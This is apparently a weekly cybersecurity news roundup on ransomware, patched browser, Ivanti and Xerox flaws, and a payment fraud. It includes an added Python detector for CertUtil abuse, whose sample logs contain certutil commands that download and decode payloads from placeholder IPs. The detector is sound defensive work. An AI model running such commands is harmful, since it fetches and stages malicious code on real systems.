Breach Update: FBI Issues Warning on Ghost Threats


Also: Lee Enterprises Recovering From Ransomware Attack, Ivanti POC Released


This week, ISMG rounds up notable cybersecurity incidents worldwide: an FBI warning about Ghost ransomware, Google patching Chrome vulnerabilities, and Lee Enterprises confirming a ransomware incident. Also, a proof-of-concept was released for Ivanti Endpoint Manager vulnerabilities, and flaws were disclosed in Xerox printers. Finally, a Chinese cyberespionage actor appears to have moonlighted in ransomware, and NioCorp has fallen victim to a cyberheist.


Ghost Ransomware Compromises Over 70 Countries, Targeting Key Sectors

The FBI, alongside the U.S. Cybersecurity and Infrastructure Security Agency, has issued a warning about Ghost ransomware, which has hit organizations in more than 70 countries, notably in the healthcare, government, education and critical infrastructure sectors. The ransomware, active since early 2021, exploits long-known vulnerabilities in unpatched Fortinet, ColdFusion and Microsoft Exchange systems. The group, also referred to as Cring and Crypt3r, varies its malware and ransom practices to obscure its tracks, complicating attribution for authorities.

The group's intrusions rely on established tools such as Mimikatz and Cobalt Strike, with the ransomware itself deployed via Windows CertUtil to avoid detection. The group's origins, traced to China, make it an anomaly in a ransomware landscape dominated by Russian-speaking operators.
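A defender-side check consistent with the CertUtil abuse described above, added here as an example and not part of ISMG's reporting or the FBI/CISA advisory: it scans constructed process-creation records (the pipe-delimited format, hostnames, paths and URLs are all made up for this example) and flags certutil command lines that download or decode files, while letting ordinary certificate operations pass.

```python
# Flag suspicious certutil.exe command lines in process-creation logs (added example).
# CertUtil is a signed Windows tool, but -urlcache and -decode let an intruder fetch
# and unpack a payload under a trusted binary; the log format below is constructed.
import re
from collections import namedtuple
from typing import List, Optional

# Constructed sample: timestamp | host | parent image | image | command line
SAMPLE_LOG = """\
2025-02-18T09:12:03Z|WS01|explorer.exe|certutil.exe|certutil -dump C:\\Users\\a\\cert.cer
2025-02-18T09:15:44Z|WS01|cmd.exe|certutil.exe|certutil -urlcache -split -f http://198.51.100.7/s.bin C:\\Windows\\Temp\\u.bin
2025-02-18T09:15:51Z|WS01|cmd.exe|certutil.exe|certutil -decode C:\\Windows\\Temp\\u.bin C:\\Windows\\Temp\\u.exe
2025-02-18T09:20:10Z|SRV02|svchost.exe|certutil.exe|certutil /verify /urlfetch C:\\tmp\\chain.cer
2025-02-18T09:21:00Z|WS03|explorer.exe|certutil.exe|certutil /URLCACHE /f https://203.0.113.9/a.txt a.txt
"""

# certutil accepts "-" or "/" as the switch prefix, in any letter case.
URLCACHE_RE = re.compile(r"(?:^|\s)[-/]urlcache\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
DECODE_RE = re.compile(r"(?:^|\s)[-/]decode(?:hex)?\b", re.IGNORECASE)
# Parents that point to scripted use rather than an admin doing certificate work.
SCRIPT_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

Finding = namedtuple("Finding", "timestamp host severity reason cmdline")

def classify(cmdline: str) -> Optional[str]:
    """Return why a certutil command line is suspicious, or None if it looks benign."""
    if URLCACHE_RE.search(cmdline) and URL_RE.search(cmdline):
        return "urlcache download of a remote file"
    if DECODE_RE.search(cmdline):
        return "decode of a local file into a new artifact"
    return None  # -dump, -verify -urlfetch and similar legitimate uses fall through

def flag_certutil_abuse(log_text: str) -> List[Finding]:
    """Scan pipe-delimited process-creation records and return certutil findings."""
    findings = []
    for line in filter(None, log_text.splitlines()):
        ts, host, parent, image, cmdline = line.split("|", 4)
        if image.lower() != "certutil.exe":
            continue
        reason = classify(cmdline)
        if reason is None:
            continue
        severity = "high" if parent.lower() in SCRIPT_PARENTS else "medium"
        findings.append(Finding(ts, host, severity, reason, cmdline))
    return findings

if __name__ == "__main__":
    for f in flag_certutil_abuse(SAMPLE_LOG):
        print(f"{f.timestamp} {f.host} [{f.severity}] {f.reason}: {f.cmdline}")
```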

Google Addresses Major Chrome Vulnerabilities

Google has released patches for two high-severity Chrome vulnerabilities, CVE-2025-0999 and CVE-2025-1426: heap buffer overflows in the V8 JavaScript engine and the GPU component that could enable remote code execution and full system takeover. A third, medium-severity flaw, CVE-2025-1006, is a use-after-free bug that could also allow arbitrary code execution. Fixes are available for all major operating systems.

Lee Enterprises Acknowledges Ransomware Disruption to Newspaper Operations

Lee Enterprises, a major U.S. newspaper chain, has publicly confirmed that a ransomware attack disrupted operations at numerous publications. The media group, which publishes 350 newspapers across 25 states and ranks as the fourth-largest newspaper company in the country, initially described the event as a "cyber incident" on February 3. At least 75 newspapers suffered significant disruptions to printing, subscriptions and internal services as a result of the attack.

Initial assessments indicate that the attackers encrypted critical applications and exfiltrated sensitive files. Although the company stopped short of explicitly labeling the incident ransomware, the attack displays classic ransomware characteristics. Recovery is under way, with key operations resuming by February 12; some weekly publications, accounting for an estimated 5% of revenue, are still affected. The financial impact remains uncertain, but the company has cybersecurity insurance to cover incident response and investigation costs.

Ivanti Endpoint Manager Vulnerabilities Exploited in Proof-of-Concept

This week, Horizon3.ai released a proof-of-concept exploit chaining four vulnerabilities in Ivanti Endpoint Manager that Ivanti patched in January. The vulnerabilities, CVE-2024-10811, CVE-2024-13161, CVE-2024-13160 and CVE-2024-13159, could allow attackers to capture the Ivanti EPM machine account's credentials, enabling relay attacks and potential server compromise. They stem primarily from inadequate input sanitization in APIs tied to endpoint management, which allows unauthorized function calls.

Xerox Printer Vulnerabilities Could Threaten Windows Environments

Two recently patched vulnerabilities in Xerox's VersaLink C7025 printers could pose significant risk by enabling attacks that capture Windows Active Directory credentials. Rapid7 researchers identified the flaws, tracked as CVE-2024-12510 and CVE-2024-12511, in firmware prior to version 57.69.91. Attackers can exploit them to reconfigure a printer so that it sends its stored authentication credentials to attacker-controlled servers. If those stored credentials belong to a domain admin, this could ultimately grant attackers full control over the Windows environment, including databases and email systems.

Exploiting these vulnerabilities requires only basic access to the printer, which is frequently left unprotected because organizations fail to change default printer passwords. Xerox has released a firmware update to mitigate the risk.

Chinese Espionage Group Linked to Ransomware Incidents

Researchers at Symantec have discovered a threat actor using tools associated with Chinese nation-state espionage in a ransomware attack on a medium-sized software and services company in South Asia. The assessment suggests the attacker may be dual-hatting, using resources from their primary employer for illicit personal gain.

According to the findings, the attacker entered the target's network via a Palo Alto Networks vulnerability tracked as CVE-2024-0012. The intruder deployed a variant of the PlugX malware typically observed in state-sponsored operations. There are indications that this actor has engaged in ransomware activity for some time, leading the researchers to dismiss the possibility that the attacks serve only as a distraction from espionage.

NioCorp Reports $500K Loss Due to Cyber Heist

NioCorp Developments Ltd. has disclosed a cybersecurity breach that resulted in $500,000 in misdirected vendor payments. The intrusion, detected last Friday, involved unauthorized access to the company's email systems. NioCorp has since notified financial institutions and law enforcement, but has not said whether the misappropriated funds can be recovered.


Reporting contributed by Information Security Media Group’s Akshaya Asokan in Southern England, Prajeet Nair in Bengaluru, India, and David Perera in Washington, D.C.
